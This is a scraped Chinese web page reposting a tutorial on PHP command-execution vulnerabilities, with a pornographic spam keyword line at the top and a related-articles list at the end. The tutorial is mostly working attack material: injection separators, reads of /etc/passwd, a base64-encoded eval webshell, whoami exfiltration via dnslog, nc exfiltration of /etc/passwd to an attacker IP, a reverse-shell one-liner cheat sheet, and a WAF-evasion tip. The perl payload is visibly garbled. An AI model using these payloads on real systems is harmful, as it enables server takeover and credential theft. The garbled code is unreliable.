国产 无码 综合区,色欲AV无码国产永久播放,无码天堂亚洲国产AV,国产日韩欧美女同一区二区

【網(wǎng)絡(luò)安全】命令執(zhí)行漏洞

這篇具有很好參考價(jià)值的文章主要介紹了【網(wǎng)絡(luò)安全】命令執(zhí)行漏洞。希望對(duì)大家有所幫助。如果存在錯(cuò)誤或未考慮完全的地方,請(qǐng)大家不吝賜教,您也可以點(diǎn)擊"舉報(bào)違法"按鈕提交疑問(wèn)。

命令執(zhí)行漏洞原理

應(yīng)用程序中有時(shí)候需要調(diào)用一些執(zhí)行系統(tǒng)命令的函數(shù),在php中常見(jiàn)的為system、exec、shell_execpassthru、proc_poenpopen等函數(shù)用來(lái)執(zhí)行系統(tǒng)命令。當(dāng)黑客能控制這些函數(shù)的參數(shù)時(shí),就可以講惡意的系統(tǒng)命令拼接到正常的命令中,就會(huì)命令執(zhí)行攻擊,這就是命令執(zhí)行漏洞。

危害

  1. 繼承web服務(wù)器的權(quán)限執(zhí)行系統(tǒng)命令
  2. 繼承web服務(wù)器程序權(quán)限,讀寫(xiě)文件
  3. 反彈shell
  4. 控制整個(gè)網(wǎng)站
  5. 控制整個(gè)服務(wù)器

檢測(cè)方法

有回顯檢測(cè)方法

常用方法:

; (分號(hào)) 從左到右執(zhí)行

命令執(zhí)行漏洞挖掘,網(wǎng)絡(luò)安全,web安全,安全,服務(wù)器

| (管道符) 將見(jiàn)面命令的輸入為后面命令的標(biāo)準(zhǔn)輸入

命令執(zhí)行漏洞挖掘,網(wǎng)絡(luò)安全,web安全,安全,服務(wù)器

&(后臺(tái)任務(wù)符號(hào)) 命令從左到右執(zhí)行

命令執(zhí)行漏洞挖掘,網(wǎng)絡(luò)安全,web安全,安全,服務(wù)器

&&(與) 邏輯與,前面命令執(zhí)行成功后才會(huì)執(zhí)行

命令執(zhí)行漏洞挖掘,網(wǎng)絡(luò)安全,web安全,安全,服務(wù)器

||(或) 邏輯或,前面執(zhí)行失敗才能執(zhí)行

命令執(zhí)行漏洞挖掘,網(wǎng)絡(luò)安全,web安全,安全,服務(wù)器

`(反引號(hào))當(dāng)命令解析時(shí),首先執(zhí)行反引號(hào)之間的操作

命令執(zhí)行漏洞挖掘,網(wǎng)絡(luò)安全,web安全,安全,服務(wù)器

$(命令替換符)與反應(yīng)號(hào)功能一樣

命令執(zhí)行漏洞挖掘,網(wǎng)絡(luò)安全,web安全,安全,服務(wù)器

有回顯常用判斷方式

win 操作系統(tǒng)
type c:\windows\win.ini
linux 操作系統(tǒng)
cat /etc/passwd

無(wú)回顯且有寫(xiě)入權(quán)限
  1. 傳webshell到服務(wù)器中
|echo "PD9waHAgcGhwaW5mbygpO2V2YWwoJF9QT1NUWydjbWQnXSk/Pg=="|base64 -d >shell.php  #base64解碼后寫(xiě)入到shell.php文件中

命令執(zhí)行漏洞挖掘,網(wǎng)絡(luò)安全,web安全,安全,服務(wù)器
命令執(zhí)行漏洞挖掘,網(wǎng)絡(luò)安全,web安全,安全,服務(wù)器

  1. 查看是否可以訪問(wèn)
    命令執(zhí)行漏洞挖掘,網(wǎng)絡(luò)安全,web安全,安全,服務(wù)器

  2. 使用webshell工具連接
    命令執(zhí)行漏洞挖掘,網(wǎng)絡(luò)安全,web安全,安全,服務(wù)器
    命令執(zhí)行漏洞挖掘,網(wǎng)絡(luò)安全,web安全,安全,服務(wù)器

無(wú)回顯利用dnslog平臺(tái)檢測(cè)

借助dnslog.cn查看訪問(wèn)
鏈接: http://dnslog.cn/
命令執(zhí)行漏洞挖掘,網(wǎng)絡(luò)安全,web安全,安全,服務(wù)器

  1. 訪問(wèn)dnslog平臺(tái)生成的域名
`whoami`.7w1v2u.dnslog.cn
  1. 查看dnslog平臺(tái)是否有訪問(wèn)信息
    命令執(zhí)行漏洞挖掘,網(wǎng)絡(luò)安全,web安全,安全,服務(wù)器
無(wú)回顯利用bp檢測(cè)

利用原理與dnslog是一樣的

  1. 找到bp相關(guān)模塊

命令執(zhí)行漏洞挖掘,網(wǎng)絡(luò)安全,web安全,安全,服務(wù)器

  1. 復(fù)制dns地址
    命令執(zhí)行漏洞挖掘,網(wǎng)絡(luò)安全,web安全,安全,服務(wù)器

  2. 訪問(wèn)此地址

|ping -c 4 m1odth5coly60euvoihemfn5kwqnec.burpcollaborator.net
  1. 刷新bp查看結(jié)果
    命令執(zhí)行漏洞挖掘,網(wǎng)絡(luò)安全,web安全,安全,服務(wù)器
無(wú)回顯利用netcat命令檢測(cè)
  1. 使用kali監(jiān)聽(tīng)9999端口

命令執(zhí)行漏洞挖掘,網(wǎng)絡(luò)安全,web安全,安全,服務(wù)器

  1. 漏洞位置輸入命令
|nc 192.168.0.107 9999 </etc/passwd
  1. 查看kali生成的文件信息

命令執(zhí)行漏洞挖掘,網(wǎng)絡(luò)安全,web安全,安全,服務(wù)器

命令執(zhí)行漏洞nc反彈shell

  1. 使用kali監(jiān)聽(tīng)
nc -vlnp 8080
  1. 漏洞位置執(zhí)行命令
|/bin/bash -c 'bash -i >& /dev/tcp/192.168.0.107/8080 0>&1'

命令執(zhí)行漏洞挖掘,網(wǎng)絡(luò)安全,web安全,安全,服務(wù)器
命令執(zhí)行漏洞挖掘,網(wǎng)絡(luò)安全,web安全,安全,服務(wù)器

常用的shell反彈命令:

bash shell 執(zhí)行
||/bin/bash -c ‘bash -i >& /dev/tcp/192.168.0.124/8080 0>&1’
perl -e ‘use
Socket; i = " 10.0.0.1 " ; i="10.0.0.1"; i="10.0.0.1";p=1234;socket(S,PF_INET,SOCK_STREAM,getprotobyname(
“tcp”));if(connect(S,sockaddr_in( p , i n e t a t o n ( p,inet_aton( p,ineta?ton(i)))){open(STDIN,“>&S”);open(STD
OUT,“>&S”);open(STDERR,“>&S”);exec(“/bin/sh -i”);};’
python -c ‘import
socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.co
nnect((“10.0.0.1”,1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);
os.dup2(s.fileno(),2);p=subprocess.call([“/bin/sh”,“-i”]);’
php -r ‘$sock=fsockopen(“10.0.0.1”,1234);exec(“/bin/sh -i <&3 >&3 2>&3”);’
ruby -rsocket -e’f=TCPSocket.open(“10.0.0.1”,1234).to_i;exec sprintf(“/bin/sh -i
<&%d >&%d 2>&%d”,f,f,f)’
nc -e /bin/sh 10.0.0.1 1234
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.0.0.1 1234 >/tmp/f
r = Runtime.getRuntime()
p = r.exec([“/bin/bash”,“-c”,“exec 5<>/dev/tcp/10.0.0.1/2002;cat <&5 | while read line;
do $line 2>&5 >&5; done”] as String[])
p.waitFor()

tips: 如果遇到waf連接可以把語(yǔ)句進(jìn)行base64加密后輸入文章來(lái)源地址http://www.zghlxwxcb.cn/news/detail-772277.html

到了這里,關(guān)于【網(wǎng)絡(luò)安全】命令執(zhí)行漏洞的文章就介紹完了。如果您還想了解更多內(nèi)容,請(qǐng)?jiān)谟疑辖撬阉鱐OY模板網(wǎng)以前的文章或繼續(xù)瀏覽下面的相關(guān)文章,希望大家以后多多支持TOY模板網(wǎng)!

本文來(lái)自互聯(lián)網(wǎng)用戶(hù)投稿,該文觀點(diǎn)僅代表作者本人,不代表本站立場(chǎng)。本站僅提供信息存儲(chǔ)空間服務(wù),不擁有所有權(quán),不承擔(dān)相關(guān)法律責(zé)任。如若轉(zhuǎn)載,請(qǐng)注明出處: 如若內(nèi)容造成侵權(quán)/違法違規(guī)/事實(shí)不符,請(qǐng)點(diǎn)擊違法舉報(bào)進(jìn)行投訴反饋,一經(jīng)查實(shí),立即刪除!

領(lǐng)支付寶紅包贊助服務(wù)器費(fèi)用

相關(guān)文章

  • Web網(wǎng)絡(luò)安全-----Log4j高危漏洞原理及修復(fù)

    Web網(wǎng)絡(luò)安全-----Log4j高危漏洞原理及修復(fù)

    Web網(wǎng)絡(luò)安全-----紅藍(lán)攻防之信息收集 Log4j 即 log for java(java的日志) ,是Apache的一個(gè)開(kāi)源項(xiàng)目,通過(guò)使用Log4j,我們可以控制日志信息輸送的目的地是控制臺(tái)、文件、GUI組件,甚至是套接口服務(wù)器、NT的事件記錄器、UNIX Syslog守護(hù)進(jìn)程等;我們也可以控制每一條日志的輸出格式;

    2024年02月10日
    瀏覽(24)
  • [CSAW/網(wǎng)絡(luò)安全] Git泄露+命令執(zhí)行 攻防世界 mfw 解題詳析

    [CSAW/網(wǎng)絡(luò)安全] Git泄露+命令執(zhí)行 攻防世界 mfw 解題詳析

    Home界面: Home界面翻譯如下: 歡迎訪問(wèn)我的網(wǎng)站! 我自己從頭開(kāi)始寫(xiě)的! 您可以使用上面的鏈接瀏覽頁(yè)面! About界面: 觀察到 Git ,聯(lián)想 Git泄露 Git是一個(gè)非常流行的開(kāi)源分布式版本控制系統(tǒng),它被廣泛用于協(xié)同開(kāi)發(fā)和代碼管理。許多網(wǎng)站和應(yīng)用程序都使用Git作為其代碼管

    2024年02月06日
    瀏覽(18)
  • RCE遠(yuǎn)程命令執(zhí)行漏洞挖掘思路

    RCE遠(yuǎn)程命令執(zhí)行漏洞挖掘思路

    1.URL上 在 url參數(shù)上 ,不僅僅可能存在ssrf漏洞,也有很大概率存在命令執(zhí)行,很大可能調(diào)用系統(tǒng)命令如curl。 payload例子: index.php?id=2;}phpinfo();/* ttp://www.xxx.com/cmd.php?cmd=phpinfo() 比如訪問(wèn)到如下URL,在jsp后面嘗試加參數(shù),比如path(什么參數(shù)需要試) ? ? http://x.x.x.x:28076/file/dirF

    2024年02月01日
    瀏覽(22)
  • 網(wǎng)絡(luò)安全全棧培訓(xùn)筆記(WEB攻防-51-WEB攻防-通用漏洞&驗(yàn)證碼識(shí)別&復(fù)用&調(diào)用&找回密碼重定向&狀態(tài)值)

    網(wǎng)絡(luò)安全全棧培訓(xùn)筆記(WEB攻防-51-WEB攻防-通用漏洞&驗(yàn)證碼識(shí)別&復(fù)用&調(diào)用&找回密碼重定向&狀態(tài)值)

    知識(shí)點(diǎn): 1、找回密碼邏輯機(jī)制-回顯驗(yàn)證碼指向 2、驗(yàn)證碼驗(yàn)證安全機(jī)制-爆破復(fù)用識(shí)別 3、找回密碼客戶(hù)端回顯Response狀態(tài)值修改重定向 4、驗(yàn)證碼技術(shù)驗(yàn)證碼爆破,驗(yàn)證碼復(fù)用,驗(yàn)證碼識(shí)別等 詳細(xì)點(diǎn): 找回密碼流程安全: 1、用回顯狀態(tài)判斷-res前端判斷不安全 2、用用戶(hù)名重

    2024年01月16日
    瀏覽(34)
  • [網(wǎng)絡(luò)安全]一文帶你了解SSTI漏洞(結(jié)合Web_python_template_injection解題詳析)

    [網(wǎng)絡(luò)安全]一文帶你了解SSTI漏洞(結(jié)合Web_python_template_injection解題詳析)

    SSTI是Server-Side Template Injection的縮寫(xiě),是一種Web應(yīng)用程序安全漏洞,主要存在于使用基于模板引擎的Web應(yīng)用程序中。 SSTI漏洞的主要原因是 在Web應(yīng)用程序中使用了基于模板引擎的渲染功能,并且沒(méi)有正確地驗(yàn)證和過(guò)濾用戶(hù)輸入的數(shù)據(jù)。當(dāng)攻擊者能夠構(gòu)造特定的輸入并成功地注入

    2024年02月08日
    瀏覽(24)
  • 網(wǎng)絡(luò)安全全棧培訓(xùn)筆記(53-WEB攻防-通用漏洞&CRLF注入&URL重定向&資源處理拒絕服務(wù))

    網(wǎng)絡(luò)安全全棧培訓(xùn)筆記(53-WEB攻防-通用漏洞&CRLF注入&URL重定向&資源處理拒絕服務(wù))

    知識(shí)點(diǎn): 1、CRLF注入-原理檢測(cè)利用 2、URL重定向-原理檢測(cè)利用 3、Web拒絕服務(wù)-原理檢測(cè)利用 #下節(jié)預(yù)告: 1、JSONPCORS跨域 2、域名安全接管劫持 #詳細(xì)點(diǎn): 1.CRLF注入漏洞,是因?yàn)閃b應(yīng)用沒(méi)有對(duì)用戶(hù)輸入做嚴(yán)格驗(yàn)證,導(dǎo)致攻擊者可以輸入一些 惡意字符。攻擊者一旦向清求行或首部

    2024年01月15日
    瀏覽(32)
  • 【W(wǎng)eb安全】小白怎么快速挖到第一個(gè)漏洞,src漏洞挖掘經(jīng)驗(yàn)分享,絕對(duì)干貨!

    【W(wǎng)eb安全】小白怎么快速挖到第一個(gè)漏洞,src漏洞挖掘經(jīng)驗(yàn)分享,絕對(duì)干貨!

    src漏洞挖掘經(jīng)驗(yàn)分享 – 掌控安全以恒 一、公益src 公益src是一個(gè)白帽子提交隨機(jī)發(fā)現(xiàn)的漏洞的品臺(tái),我們可以把我們隨機(jī)發(fā)現(xiàn)或者是主動(dòng)尋找到的漏洞在漏洞盒子進(jìn)行提交。 在挖掘src的時(shí)候不能越紅線,一般情況下遇到SQL注入 只獲取數(shù)據(jù)庫(kù)名字以證明漏洞的存在即可,最好

    2024年02月13日
    瀏覽(25)
  • 【網(wǎng)絡(luò)安全】JWT安全漏洞

    【網(wǎng)絡(luò)安全】JWT安全漏洞

    Json Web Token(JWT) JSON Web Token(JWT)是一個(gè)非常輕巧的規(guī)范。這個(gè)規(guī)范允許我們使用JWT在兩個(gè)組織之間傳遞安全可靠的信息。 JWT是一個(gè)有著簡(jiǎn)單的統(tǒng)一表達(dá)形式的字符串: 頭部(Header) 頭部用于描述關(guān)于該JWT的最基本的信息,例如其類(lèi)型以及簽名所用的算法等。 JSON內(nèi)容要經(jīng)

    2024年02月12日
    瀏覽(32)
  • 多個(gè)安全廠商安全設(shè)備 遠(yuǎn)程命令執(zhí)行漏洞復(fù)現(xiàn)

    多個(gè)安全廠商安全設(shè)備 遠(yuǎn)程命令執(zhí)行漏洞復(fù)現(xiàn)

    此文章僅用于技術(shù)交流,嚴(yán)禁用于對(duì)外發(fā)起惡意攻擊!??! 該漏洞可執(zhí)行遠(yuǎn)程代碼 FOFA:body=“/webui/images/default/default/alert_close.jpg”

    2024年02月03日
    瀏覽(20)
  • 網(wǎng)絡(luò)安全漏洞分類(lèi)詳解

    一、漏洞類(lèi)型 緩沖區(qū)溢出、跨站腳本、DOS攻擊、掃描、SQL注入、木馬后門(mén)、病毒蠕蟲(chóng)、web攻擊、僵尸網(wǎng)絡(luò)、跨站請(qǐng)求偽造、文件包含、文件讀取、目錄遍歷攻擊、敏感信息泄露、暴力破解、代碼執(zhí)行漏洞、命令執(zhí)行、弱口令、上傳漏洞利用、webshell利用、配置不當(dāng)/錯(cuò)誤、邏輯

    2024年02月04日
    瀏覽(33)

覺(jué)得文章有用就打賞一下文章作者

支付寶掃一掃打賞

博客贊助

微信掃一掃打賞

請(qǐng)作者喝杯咖啡吧~博客贊助

支付寶掃一掃領(lǐng)取紅包,優(yōu)惠每天領(lǐng)

二維碼1

領(lǐng)取紅包

二維碼2

領(lǐng)紅包